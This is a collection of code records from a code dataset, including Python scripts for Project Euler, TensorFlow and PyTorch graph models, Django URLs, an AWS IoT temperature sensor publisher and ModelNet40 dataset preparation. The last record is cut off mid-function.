+{"seq_id":"564232431","text":"'''\nStores all course objects based on current major in hashmap to easily assemble the tree.\n\ni.e.\n{\n BIO123 : corresponding base or nonbase course,\n ...,\n ...,\n MATH23 : base or nonbase course\n}\n'''\n\nimport courseInfoStorage as CIS\n\nclass courseConnections():\n '''\n Created 07/21/2021 by MFF\n '''\n\n def __init__(self, courses):\n self.courses = courses\n self.courseMap = {}\n\n def coursesToMap(self):\n #Take the list of courses and then using access paramters store in the hashmap\n\n for course in self.courses:\n courseKey = course.getKey()\n\n if courseKey not in self.courseMap:\n self.courseMap[courseKey] = course\n\n return\n\n # Return the prereq classes for a give course key\n def returnPrereqs(self, courseKey):\n if courseKey in self.courseMap:\n try:\n return self.courseMap[courseKey].getPrereqs()\n except TypeError as err:\n print(err)\n print(\"Requested course has no prereqs\")\n\n return\n\n def returnCourse(self, courseKey):\n if courseKey in self.courseMap:\n return self.courseMap[courseKey]\n\n return\n\n##END##\n","sub_path":"courseConnectionStorage.py","file_name":"courseConnectionStorage.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"42665928","text":"#Find the sum of all numbers, less than one million, which are palindromic in base 10 and base 2.\n\nmy_sum = 25\n\noddNumbers = []\n\nfor j in range (11, 1000000):\n if j%2 == 1:\n oddNumbers.append(j)\n \nfor i in oddNumbers:\n \n nts = str(i) #nts = num to string\n \n if len(nts) == 2 or len(nts) == 3: \n if nts[0] == nts[-1]: \n mb = bin(i)[2:] \n if len(mb) == 4 or len(mb) == 5: \n if mb[:2] == mb[:-3:-1]:\n my_sum += i\n if len(mb) == 6 or len(mb) == 7:\n if mb[:3] == mb[:-4:-1]:\n my_sum += i\n if len(mb) == 8 or len(mb) == 9:\n if mb[:4] == mb[:-5:-1]:\n my_sum += i\n if len(mb) == 10:\n if mb[:5] == mb[:-6:-1]:\n my_sum += i\n\n if len(nts) == 4 or len(nts) == 5:\n if nts[:2] == nts[:-3:-1]:\n mb = bin(i)[2:] #mb = my bin\n if len(mb) == 10 or len(mb) == 11: \n if mb[:5] == mb[:-6:-1]:\n my_sum += i\n if len(mb) == 12 or len(mb) == 13:\n if mb[:6] == mb[:-7:-1]:\n my_sum += i\n if len(mb) == 14 or len(mb) == 15:\n if mb[:7] == mb[:-8:-1]:\n my_sum += i\n if len(mb) == 16 or len(mb) == 17:\n if mb[:8] == mb[:-9:-1]:\n my_sum += i\n\n if len(nts) == 6:\n if nts[:3] == nts[:-4:-1]:\n mb = bin(i)[2:] #mb = my bin\n if len(mb) == 17: \n if mb[:8] == mb[:-9:-1]:\n my_sum += i\n if len(mb) == 18 or len(mb) == 19:\n if mb[:9] == mb[:-10:-1]:\n my_sum += i\n if len(mb) == 20 or len(mb) == 15:\n if mb[:10] == mb[:-11:-1]:\n my_sum += i\n\nprint(my_sum)\n","sub_path":"p36.py","file_name":"p36.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"444578982","text":"'''\n@Author : sean cheng\n@Email : aya234@163.com\n@Create_Time : 2018/9/5\n@Program : 从键盘输入一些字符,逐个把它们写到指定的文件,直到输入一个@为止。\n'''\nfilename = input(\"请输入文件名:\\n\")\nfp = open(filename+'.txt','w',encoding='utf-8')\nch = input(\"请输入字符串:\\n\")\nwhile True:\n if '@' in ch:\n fp.write(ch.split('@')[0])\n break\n else:\n fp.write(ch + \" \")\n ch = input(\"请输入字符串:\\n\")\nfp.close()\n","sub_path":"python/考试练习题/in_and_out.py","file_name":"in_and_out.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"142139103","text":"import requests # https://pypi.python.org/pypi/requests/2.5.3\n # you don't need to be root to install this,\n # instead you can do a local install\nimport json # should be pre-installed with python\nfrom time import sleep,gmtime,strftime #python stdlib\nfrom subprocess import Popen #python stdlib\nfrom xsr_tools import *\n\n# -----------------------------------------------------------------------------\n\nblacklist = ['absradio',\n#\t 'binaergewitter',\n# 'dirtyminutesleft',\t\t\n#\t 'einschlafen',\n#\t 'fanboys',\n\t 'jobscast',\n\t 'macintalk',\n\t 'medienwelten',\n\t 'netzgespraeche',\n\t 'osm',\n#\t 'pandroid',\n#\t 'phasentheater',\n#\t 'quasselstrippen',\n 'reliveradio',\t\n#\t 'retinacast',\n#\t 'robotiklabor',\n#\t 'sundaymoaning',\n\t 'teezeit']\n#blacklist = []\n\nMO = MessageObj(filename=\"testlog.txt\")\n# MO = MessageObj() # <--- use this if you do not want a log file (empty brackets)\n\n# -----------------------------------------------------------------------------\n\ndef live_loop(blacklist, MO):\n MO.woof( \"%s ... waiting for streams ... \"%timestring())\n olddict = {}\n processlist = []\n while 1:\n httpsuccess, feedobj = xenim_request()\n if httpsuccess:\n newdict = parse_streaminfos_from_json(feedobj )\n olddict,processlist = oldnewcheckloop(blacklist,\n newdict,\n olddict,\n processlist,\n\t\t\t\t\t\t MO)\n else:\n MO.woof(\"%s HTTP error, let's act as if nothing happened ...\"%(timestring()))\n sleep(30) # seconds, don't set to low and ddos xenim!\n\nlive_loop(blacklist,MO)\n\n \n","sub_path":"xstreamrecorder.py","file_name":"xstreamrecorder.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"233289639","text":"import tensorflow as tf\nfrom preprocessing import tf_image\nfrom preprocessing import preprocessing_rfcn as pr\n\n\n\ndef preproces_for_train(image, labels, bboxes, input_shape, crop_shape, out_shape):\n image, labels, bboxes = local_preprocess_for_train(image, labels, bboxes, input_shape, crop_shape, out_shape)\n return image, labels, bboxes\n\ndef preprocess_for_eval(image,out_shape):\n img = tf.image.convert_image_dtype(image, tf.float32)\n img = tf_image.resize_image(img, out_shape,\n method=tf.image.ResizeMethod.BILINEAR,\n align_corners=False)\n img = resnet_norm(img)\n return img\n\ndef resnet_norm(img, mean=(0.485, 0.456, 0.406),std=(0.229, 0.224, 0.225)):\n mean_tensor = tf.constant(mean, tf.float32)\n std_tensor = tf.constant(std, tf.float32)\n ret_img = tf.div(img - mean_tensor, std_tensor)\n return ret_img\n\ndef resnet_denorm(img, mean=(0.485, 0.456, 0.406),std=(0.229, 0.224, 0.225)):\n mean_tensor = tf.constant(mean, tf.float32)\n std_tensor = tf.constant(std, tf.float32)\n ret_img = img * std_tensor + mean_tensor\n return ret_img\n\n\ndef vgg_norm(img):\n _R_MEAN = 123.68\n _G_MEAN = 116.78\n _B_MEAN = 103.94\n _NUM_CHANNELS = 3\n means = (_R_MEAN, _G_MEAN, _B_MEAN)\n channels = tf.split(axis=2, num_or_size_splits=_NUM_CHANNELS, value=img)\n for i in range(_NUM_CHANNELS):\n channels[i] -= means[i]\n return tf.concat(axis=2, values=channels)\n\n\ndef local_preprocess_for_train(image, labels, bboxes, input_shape, crop_shape,\n out_shape, data_format='NHWC',\n scope='rfcn_preprocessing_train'):\n\n fast_mode = False\n with tf.name_scope(scope, 'rfcn_preprocessing_train', [image, labels, bboxes]):\n if image.get_shape().ndims != 3:\n raise ValueError('Input must be of size [height, width, C>0]')\n # Convert to float scaled [0, 1].\n if image.dtype != tf.float32:\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n\n dst_image, dst_labels, dst_bboxes = pr.random_crop(image, labels, bboxes, img_shape=input_shape, crop_shape=crop_shape, keep_ratio=0.7, random_scale=(0.7, 1.3))\n\n dst_image = tf.image.resize(dst_image, (out_shape[0], out_shape[1]))\n\n dst_image, dst_bboxes = tf_image.random_flip_left_right(dst_image, dst_bboxes)\n\n #dst_image = pr.apply_with_random_selector(dst_image,lambda x, ordering: pr.distort_color(x, ordering, fast_mode),num_cases=4)\n\n dst_image = pr.resnet_norm(dst_image)\n\n if data_format == 'NCHW':\n dst_image = tf.transpose(image, perm=(2, 0, 1))\n return dst_image , dst_labels, dst_bboxes\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"bin/citypersons/cp_preprocess.py","file_name":"cp_preprocess.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"126879016","text":"import os.path as osp\r\nimport pandas as pd\r\nimport pickle as pkl\r\nimport numpy as np\r\nimport torch\r\ndevice = torch.device(\"cuda:4\")\r\ndata_root = '/home/kevinwm99/MOT/mot_neural_solver/data/MOT17Labels/train/MOT17-02-DPM/gt/gt.txt'\r\nseq_path = '/home/kevinwm99/MOT/mot_neural_solver/data/MOT17Labels/train/MOT17-02-DPM'\r\nGT_COL_NAMES = ('frame', 'id', 'bb_left', 'bb_top', 'bb_width', 'bb_height', 'conf', 'label', 'vis')\r\n# short-term dataset\r\nif __name__ == \"__main__\":\r\n det_df = pd.read_csv(data_root)\r\n det_df = det_df[det_df.columns[:len(GT_COL_NAMES)]]\r\n det_df.columns = GT_COL_NAMES\r\n\r\n det_df['bb_left'] -= 1 # Coordinates are 1 based\r\n det_df['bb_top'] -= 1\r\n\r\n # VERY IMPORTANT: Filter out non Target Classes (e.g. vehicles, occluderst, etc.) (see: https://arxiv.org/abs/1603.00831)\r\n det_df = det_df[det_df['label'].isin([1, 2])].copy()\r\n\r\n det_df['frame_path'] = det_df['frame'].apply(lambda frame_num: osp.join(seq_path[:-3], f'img1/{frame_num:06}.jpg'))\r\n frame_num = (torch.from_numpy(det_df.frame.values)).to(device)\r\n detection_id = torch.from_numpy(det_df.id.values)\r\n frame_num =frame_num.to(device)\r\n unique_ids = (det_df.id.unique())\r\n\r\n max_frame_dist = 5\r\n edge_ixs = []\r\n len_prev_object = 0\r\n for id_ in unique_ids:\r\n frame_idx = torch.where(detection_id == id_)[0]+1\r\n changepoints = torch.where(frame_idx[1:] != frame_idx[:-1])[0] + 1\r\n changepoints = torch.cat((changepoints, torch.as_tensor([frame_idx.shape[0]]).to(changepoints.device)))\r\n all_det_ixs = torch.arange(frame_idx.shape[0], device=frame_idx.device)\r\n for start_frame_ix, end_frame_ix in zip(changepoints[:-1], changepoints[1:]):\r\n curr_frame_ixs = all_det_ixs[start_frame_ix: end_frame_ix]\r\n curr_frame_num = frame_idx[curr_frame_ixs[0]]\r\n curr_frame_id = detection_id[curr_frame_ixs[0]]\r\n past_frames_ixs = torch.where(torch.abs(frame_idx[:start_frame_ix] - curr_frame_num) <= max_frame_dist)[0]\r\n\r\n edge_ixs.append(torch.cartesian_prod(past_frames_ixs+len_prev_object, curr_frame_ixs+len_prev_object))\r\n len_prev_object +=len(frame_idx)\r\n #\r\n edge_ixs = torch.cat(edge_ixs).T\r\n\r\n print(\"source: {}\".format(edge_ixs[0][:400]))\r\n print(\"destination: {}\".format(edge_ixs[1][:400]))\r\n","sub_path":"base/make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"377950227","text":"#!/home/inje/anaconda3/envs/GNN_test/bin/python\nfrom torch_geometric.datasets import Reddit\nimport torch_geometric.transforms as T\ncoradata = Reddit(root='/tmp/Reddit', transform=T.NormalizeFeatures())\ndata = coradata[0]\nprint(data.is_undirected(), \"train=\", data.train_mask.sum().item(), \"val=\", data.val_mask.sum().item(),\"test=\", data.test_mask.sum().item())\nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv\nfrom typing import Optional, Tuple\nfrom torch_geometric.typing import Adj, OptTensor, PairTensor\nfrom torch import Tensor\nfrom torch.nn import Parameter\nfrom torch_scatter import scatter_add\nfrom torch_sparse import SparseTensor, matmul, fill_diag, sum, mul\nfrom torch_geometric.nn.conv import MessagePassing\nfrom torch_geometric.utils import add_remaining_self_loops\nfrom torch_geometric.utils.num_nodes import maybe_num_nodes\n\nfrom torch_geometric.nn.inits import glorot, zeros\ntorch.cuda.empty_cache()\n\nEVAL = 0\n@torch.jit._overload\ndef gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,\n add_self_loops=True, dtype=None):\n # type: (Tensor, OptTensor, Optional[int], bool, bool, Optional[int]) -> PairTensor # noqa\n pass\n\n\n@torch.jit._overload\ndef gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,\n add_self_loops=True, dtype=None):\n # type: (SparseTensor, OptTensor, Optional[int], bool, bool, Optional[int]) -> SparseTensor # noqa\n pass\n\n\ndef gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,\n add_self_loops=True, dtype=None):\n\n fill_value = 2. if improved else 1.\n\n if isinstance(edge_index, SparseTensor):\n adj_t = edge_index\n if not adj_t.has_value():\n adj_t = adj_t.fill_value(1., dtype=dtype)\n if add_self_loops:\n adj_t = fill_diag(adj_t, fill_value)\n deg = sum(adj_t, dim=1)\n deg_inv_sqrt = deg.pow_(-0.5)\n deg_inv_sqrt.masked_fill_(deg_inv_sqrt == float('inf'), 0.)\n adj_t = mul(adj_t, deg_inv_sqrt.view(-1, 1))\n adj_t = mul(adj_t, deg_inv_sqrt.view(1, -1))\n return adj_t\n\n else:\n num_nodes = maybe_num_nodes(edge_index, num_nodes)\n\n if edge_weight is None:\n edge_weight = torch.ones((edge_index.size(1), ), dtype=dtype,\n device=edge_index.device)\n\n if add_self_loops:\n edge_index, tmp_edge_weight = add_remaining_self_loops(\n edge_index, edge_weight, fill_value, num_nodes)\n assert tmp_edge_weight is not None\n edge_weight = tmp_edge_weight\n\n row, col = edge_index[0], edge_index[1]\n deg = scatter_add(edge_weight, col, dim=0, dim_size=num_nodes)\n deg_inv_sqrt = deg.pow_(-0.5)\n deg_inv_sqrt.masked_fill_(deg_inv_sqrt == float('inf'), 0)\n return edge_index, deg_inv_sqrt[row] * edge_weight * deg_inv_sqrt[col]\n\n\nclass Myconv(GCNConv):\n _cached_edge_index: Optional[Tuple[Tensor, Tensor]]\n _cached_adj_t: Optional[SparseTensor]\n\n def __init__(self, in_channels: int, out_channels: int,\n improved: bool = False, cached: bool = False,\n add_self_loops: bool = True, normalize: bool = True,\n bias: bool = True, **kwargs):\n\n kwargs.setdefault('aggr', 'add')\n super(GCNConv, self).__init__(**kwargs)\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.improved = improved\n self.cached = cached\n self.add_self_loops = add_self_loops\n self.normalize = normalize\n\n self._cached_edge_index = None\n self._cached_adj_t = None\n\n self.weight = Parameter(torch.Tensor(in_channels, out_channels))\n\n if bias:\n self.bias = Parameter(torch.Tensor(out_channels))\n else:\n self.register_parameter('bias', None)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n glorot(self.weight)\n zeros(self.bias)\n self._cached_edge_index = None\n self._cached_adj_t = None\n\n def forward(self, x: Tensor, edge_index: Adj,\n edge_weight: OptTensor = None) -> Tensor:\n \"\"\"\"\"\"\n\n if self.normalize:\n if isinstance(edge_index, Tensor):\n cache = self._cached_edge_index\n if cache is None:\n edge_index, edge_weight = gcn_norm( # yapf: disable\n edge_index, edge_weight, x.size(self.node_dim),\n self.improved, self.add_self_loops, dtype=x.dtype)\n if self.cached:\n self._cached_edge_index = (edge_index, edge_weight)\n else:\n edge_index, edge_weight = cache[0], cache[1]\n\n elif isinstance(edge_index, SparseTensor):\n cache = self._cached_adj_t\n if cache is None:\n edge_index = gcn_norm( # yapf: disable\n edge_index, edge_weight, x.size(self.node_dim),\n self.improved, self.add_self_loops, dtype=x.dtype)\n if self.cached:\n self._cached_adj_t = edge_index\n else:\n edge_index = cache\n global EVAL\n\n x = torch.matmul(x, self.weight)\n out = self.propagate(edge_index, x=x, edge_weight=edge_weight,\n size=None)\n\n\n if self.bias is not None:\n out += self.bias\n\n return out\n\n def message(self, x_j: Tensor, edge_weight: OptTensor) -> Tensor:\n if edge_weight is None:\n return x_j\n else:\n return edge_weight.view(-1, 1) * x_j\n\n def message_and_aggregate(self, adj_t: SparseTensor, x: Tensor) -> Tensor:\n return matmul(adj_t, x, reduce=self.aggr)\n\n def __repr__(self):\n return '{}({}, {})'.format(self.__class__.__name__, self.in_channels,\n self.out_channels)\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = Myconv(coradata.num_node_features, 16, cached=True,\n normalize=not False)\n # print('conv1:', self.conv1.weight.shape)\n # conv1: torch.Size([1433, 16])\n self.conv2 = Myconv(16, coradata.num_classes, cached=True,\n normalize=not False)\n # print('conv2:',self.conv2.weight.shape)\n # conv2: torch.Size([16, 7])\n\n def forward(self, data):\n x, edge_index, edge_weight = data.x, data.edge_index, data.edge_attr\n # print('x:',x.shape, 'edge:',edge_index.shape)\n # x: torch.Size([2708, 1433]) edge: torch.Size([2, 10556])\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = F.dropout(x, training=self.training)\n x = self.conv2(x, edge_index)\n\n return F.log_softmax(x, dim=1)\n# pyprof.wrap(Net, 'forward')\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nimport torch.autograd.profiler as profiler\nmodel = Net().to(device)\ndata = coradata[0].to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=0.01, weight_decay=5e-4)\n# print(data)\nmodel.train()\nfor epoch in range(200):\n optimizer.zero_grad()\n out = model(data)\n loss = F.nll_loss(out[data.train_mask], data.y[data.train_mask])\n loss.backward()\n optimizer.step()\n\n\nmodel.eval()\nEVAL = 1\n# with cpu profiler\n# with profiler.profile(record_shapes=True) as prof:\n# with profiler.record_function(\"model_inference\"):\n# model(data)\n#\n# prof.export_chrome_trace(\"trace.json\")\n\n\n# check for evaluation\ntorch.cuda.cudart().cudaProfilerStart()\n_, pred = model(data).max(dim=1)\ntorch.cuda.cudart().cudaProfilerStop()\ncorrect = int(pred[data.test_mask].eq(data.y[data.test_mask]).sum().item())\nacc = correct / int(data.test_mask.sum())\nprint('Accuracy: {:.4f}'.format(acc))","sub_path":"Graph/GCNwithReddit.py","file_name":"GCNwithReddit.py","file_ext":"py","file_size_in_byte":7937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"563426048","text":"from django.conf.urls import url\n\nfrom accounts.views import home_view\nfrom accounts.views import admin_view\nfrom accounts.views import appointment_view\nfrom accounts.views import profile_view\n\n\nurlpatterns = [\n url(r'^$', home_view.LoginView.as_view(), name='index'),\n url(r'^logout/$', home_view.LogoutView.as_view(), name='logout'),\n url(r'^register/$', home_view.RegistrationView.as_view(), name='register'),\n url(r'^setup/$', home_view.SetupView.as_view(), name='setup'),\n url(r'^error/denied/$', home_view.ErrorDeniedView.as_view(),\n name='error_denied'),\n\n url(r'^admin/users/$', admin_view.UsersView.as_view(), name='admin_users'),\n url(r'^admin/statistics/$', admin_view.StatisticsView.as_view(),\n name='admin_statistics'),\n url(r'^admin/statistics-by-doctors/$',\n admin_view.StatisticsByDoctorsView.as_view(),\n name='admin_statistics_by_doctors'),\n url(r'^admin/createemployee/$', admin_view.CreateEmployeeView.as_view(),\n name='admin_createemployee'),\n\n url(r'^appointment/list/$', appointment_view.ListView.as_view(),\n name='appointment_list'),\n url(r'^appointment/update/$', appointment_view.UpdateView.as_view(),\n name='appointment_update'),\n url(r'^appointment/create/$', appointment_view.CreateView.as_view(),\n name='appointment_create'),\n\n url(r'^profile/$', profile_view.ProfileView.as_view(), name='profile'),\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"267126138","text":"from plotly.graph_objs import Bar, Layout\nfrom plotly import offline\n\nfrom die import Die\n\ndie_1 = Die()\ndie_2 = Die()\n\nmax_roll = 12\nmin_roll = 2\n\nroll_number = 5000\n\nresults = []\nfrequencies = []\n\nfor i in range(roll_number):\n results.append(die_1.Roll() * die_2.Roll())\n\nfor value in range(6**2):\n frequencies.append(results.count(results[value]))\n\n# Visualize the data\n\nx_values = [x * y for x in range(1, die_1.sides +1 ) for y in range(1, die_2.sides + 1)]\ndata = [Bar(x=x_values, y=frequencies)]\n\nx_axis_config = {'title': 'Multiples of the 2 dice', 'dtick':1}\ny_axis_config = {'title': 'Frequencies of the multiples'}\n\n\ncustom_layout = Layout(title='Frequency of multiples of 2 D6', xaxis=x_axis_config,\n yaxis=y_axis_config)\n\noffline.plot({'data': data, 'layout': custom_layout}, filename='multiple_of_d6_dice.html')\n","sub_path":"Data visualization/Chapter 1/plotply/multiplication_dice.py","file_name":"multiplication_dice.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"234977061","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport paho.mqtt.client as mqtt\nimport json\nimport smbus\nimport ssl\nimport sys\nimport time\n\n\n# settings\ndeviceplace = 'room_27'\nroomname = 'room_27'\n\n# AWS IoT settings\n#host = 'a2j7b734sg66k1.iot.us-east-1.amazonaws.com' # AWS IoT Endpoint\nhost = 'a118dcs9px2ff8.iot.us-east-1.amazonaws.com'\nport = 8883 # port\ncacert = './cert/rootCA.pem' # root ca\nclientCert = './cert/certificate.pem.crt' # certificate\nclientKey = './cert/private.pem.key' # private key\ntopic = 'office/room/%s' % roomname # topic\n\n\n# Sensor settings\ni2c = smbus.SMBus(1)\nAM2320 = 0x5C\n\n\ndef on_connect(client, userdata, flags, respons_code):\n print('Connected')\n\n\ndef sensing():\n while True:\n #data = {}\n #data['temperature'] = get_temperature()\n #data['humidity'] = get_humidity()\n #data['index'] = (0.81 * data['temperature']) + (0.01 * data['humidity'] * (0.99 * data['temperature'] -14.3)) + 46.3\n data = get_data()\n publish(data)\n time.sleep(2)\n\ndef get_data():\n # wake sensor\n try:\n i2c.write_i2c_block_data(AM2320, 0x00, [])\n except Exception:\n pass\n time.sleep(0.001)\n\n # send read command\n i2c.write_i2c_block_data(AM2320, 0x03, [0x00, 0x04])\n time.sleep(0.015)\n\n # get data\n blockdata = i2c.read_i2c_block_data(AM2320, 0, 8)\n\n # get temperature\n temperature = float(blockdata[4] << 8 | blockdata[5])/10\n\n # get humidity\n humidity = float(blockdata[2] << 8 | blockdata[3])/10\n\n # calc index\n tempData = {}\n tempData['index'] = (0.81 * temperature) + (0.01 * humidity * (0.99 * temperature -14.3)) + 46.3\n tempData['temperature'] = temperature\n tempData['humidity'] = humidity\n\n return tempData\n\n\ndef get_temperature():\n # wake sensor\n try:\n i2c.write_i2c_block_data(AM2320, 0x00, [])\n except Exception:\n pass\n time.sleep(0.001)\n\n # send read command\n i2c.write_i2c_block_data(AM2320, 0x03, [0x00, 0x04])\n time.sleep(0.015)\n\n # get data\n blockdata = i2c.read_i2c_block_data(AM2320, 0, 8)\n\n # get temperature\n temperature = float(blockdata[4] << 8 | blockdata[5])/10\n return temperature\n\n\ndef get_humidity():\n # wake sensor\n try:\n i2c.write_i2c_block_data(AM2320, 0x00, [])\n except Exception:\n pass\n time.sleep(0.001)\n\n # send read command\n i2c.write_i2c_block_data(AM2320, 0x03, [0x00, 0x04])\n time.sleep(0.015)\n\n # get data\n blockdata = i2c.read_i2c_block_data(AM2320, 0, 8)\n\n # get temperature\n humidity = float(blockdata[2] << 8 | blockdata[3])/10\n return humidity\n\n\ndef publish(data):\n data['place'] = deviceplace\n print(data)\n client.publish(topic, json.dumps(data, ensure_ascii=False)) # publish\n\n\nif __name__ == '__main__':\n try:\n client = mqtt.Client(client_id=\"client_27\",protocol=mqtt.MQTTv311)\n\n # certifications\n client.tls_set(\n cacert,\n certfile=clientCert,\n keyfile=clientKey,\n tls_version=ssl.PROTOCOL_TLSv1_2)\n client.tls_insecure_set(True)\n\n # callback\n client.on_connect = on_connect\n\n # port, keepalive\n client.connect(host, port=port, keepalive=60)\n\n client.loop_start()\n\n sensing()\n except KeyboardInterrupt:\n sys.exit()\n","sub_path":"aws/room-pub2.py","file_name":"room-pub2.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"94978063","text":"import os\nimport math\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--run', type=str, required=True,\n help='The command to run.')\nparser.add_argument('--scanner', type=str, required=False,\n help='The path of the virtual_scanner')\nparser.add_argument('--simplify_points', type=str, required=False,\n default='simplify_points',\n help='The path of the simplify_points')\nparser.add_argument('--transform_points', type=str, required=False,\n default='transform_points',\n help='The path of the transform_points')\nparser.add_argument('--align_y', type=str, required=False, default='false',\n help='Align the points with y axis')\n\nabs_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nroot_folder = os.path.join(abs_path, 'data/ModelNet40')\n\nargs = parser.parse_args()\nvirtual_scanner = args.scanner\nsimplify = args.simplify_points\ntransform = args.transform_points\n\n\ndef download_m40():\n # download via wget\n if not os.path.exists(root_folder):\n os.makedirs(root_folder)\n url = 'http://modelnet.cs.princeton.edu/ModelNet40.zip'\n cmd = 'wget %s -O %s/ModelNet40.zip' % (url, root_folder)\n print(cmd)\n os.system(cmd)\n\n # unzip\n cmd = 'unzip %s/ModelNet40.zip -d %s' % (root_folder, root_folder)\n print(cmd)\n os.system(cmd)\n\n\ndef download_m40_points():\n # download via wget\n if not os.path.exists(root_folder):\n os.makedirs(root_folder)\n url = 'https://www.dropbox.com/s/m233s9eza3acj2a/ModelNet40.points.zip?dl=0'\n zip_file = os.path.join(root_folder, 'ModelNet40.points.zip')\n cmd = 'wget %s -O %s' % (url, zip_file)\n print(cmd)\n os.system(cmd)\n\n # unzip\n cmd = 'unzip %s -d %s/ModelNet40.points' % (zip_file, root_folder)\n print(cmd)\n os.system(cmd)\n\n\ndef clean_off_file(filename):\n # read the contents of the file\n with open(filename) as fid:\n file_str = fid.read()\n # fix the file\n if file_str[0:3] != 'OFF':\n print('Error: not an OFF file: ' + filename)\n elif file_str[0:4] != 'OFF\\n':\n print('Info: fix an OFF file: ' + filename)\n new_str = file_str[0:3] + '\\n' + file_str[3:]\n with open(filename, 'w') as f_rewrite:\n f_rewrite.write(new_str)\n\n\ndef get_filelist(root_folder, train=True, suffix='off', ratio=1.0):\n filelist, category = [], []\n folders = sorted(os.listdir(root_folder))\n assert(len(folders) == 40)\n for idx, folder in enumerate(folders):\n subfolder = 'train' if train else 'test'\n current_folder = os.path.join(root_folder, folder, subfolder)\n filenames = sorted(os.listdir(current_folder))\n filenames = [fname for fname in filenames if fname.endswith(suffix)]\n total_num = math.ceil(len(filenames) * ratio)\n for i in range(total_num):\n filelist.append(os.path.join(folder, subfolder, filenames[i]))\n category.append(idx)\n return filelist, category\n\n\ndef move_files(src_folder, des_folder, suffix):\n folders = os.listdir(src_folder)\n for folder in folders:\n for subfolder in ['train', 'test']:\n curr_src_folder = os.path.join(src_folder, folder, subfolder)\n curr_des_folder = os.path.join(des_folder, folder, subfolder)\n if not os.path.exists(curr_des_folder):\n os.makedirs(curr_des_folder)\n filenames = os.listdir(curr_src_folder)\n for filename in filenames:\n if filename.endswith(suffix):\n os.rename(os.path.join(curr_src_folder, filename),\n os.path.join(curr_des_folder, filename))\n\n\ndef convert_mesh_to_points():\n mesh_folder = os.path.join(root_folder, 'ModelNet40')\n # Delete the following 3 files since the virtualscanner can not deal with them\n filelist = ['cone/train/cone_0117.off',\n 'curtain/train/curtain_0066.off',\n 'car/train/car_0021.off.off']\n for filename in filelist:\n filename = os.path.join(mesh_folder, filename)\n if os.path.exists(filename):\n os.remove(filename)\n\n # clean the off files\n train_list, _ = get_filelist(mesh_folder, train=True, suffix='off')\n test_list, _ = get_filelist(mesh_folder, train=False, suffix='off')\n filelist = train_list + test_list\n for filename in filelist:\n clean_off_file(os.path.join(mesh_folder, filename))\n\n # run virtualscanner\n folders = os.listdir(mesh_folder)\n for folder in folders:\n for subfolder in ['train', 'test']:\n curr_folder = os.path.join(mesh_folder, folder, subfolder)\n cmd = '%s %s 14' % (virtual_scanner, curr_folder)\n print(cmd)\n os.system(cmd)\n\n # move points\n move_files(mesh_folder, mesh_folder + '.points', 'points')\n\n\ndef simplify_points(resolution=64):\n # rename and backup the original folders\n points_folder = os.path.join(root_folder, 'ModelNet40.points')\n original_folder = points_folder + \".dense\"\n if os.path.exists(points_folder):\n os.rename(points_folder, original_folder)\n\n folders = os.listdir(original_folder)\n for folder in folders:\n for subfolder in ['train', 'test']:\n curr_folder = os.path.join(original_folder, folder, subfolder)\n # write filelist to disk\n filenames = os.listdir(curr_folder)\n filelist_name = os.path.join(curr_folder, 'list.txt')\n with open(filelist_name, 'w') as fid:\n for filename in filenames:\n if filename.endswith('.points'):\n fid.write(os.path.join(curr_folder, filename) + '\\n')\n # run simplify_points\n output_path = os.path.join(points_folder, folder, subfolder)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n cmd = '%s --filenames %s --output_path %s --dim %d' % \\\n (simplify, filelist_name, output_path, resolution)\n print(cmd)\n os.system(cmd)\n os.remove(filelist_name)\n\n\ndef transform_points():\n points_folder = os.path.join(root_folder, 'ModelNet40.points')\n output_folder = os.path.join(root_folder, 'ModelNet40.points.y')\n folders = os.listdir(points_folder)\n for folder in folders:\n for subfolder in ['train', 'test']:\n curr_folder = os.path.join(points_folder, folder, subfolder)\n output_path = os.path.join(output_folder, folder, subfolder)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n # write filelist to disk\n filenames = os.listdir(curr_folder)\n filelist_name = os.path.join(curr_folder, 'list.txt')\n with open(filelist_name, 'w') as fid:\n for filename in filenames:\n if 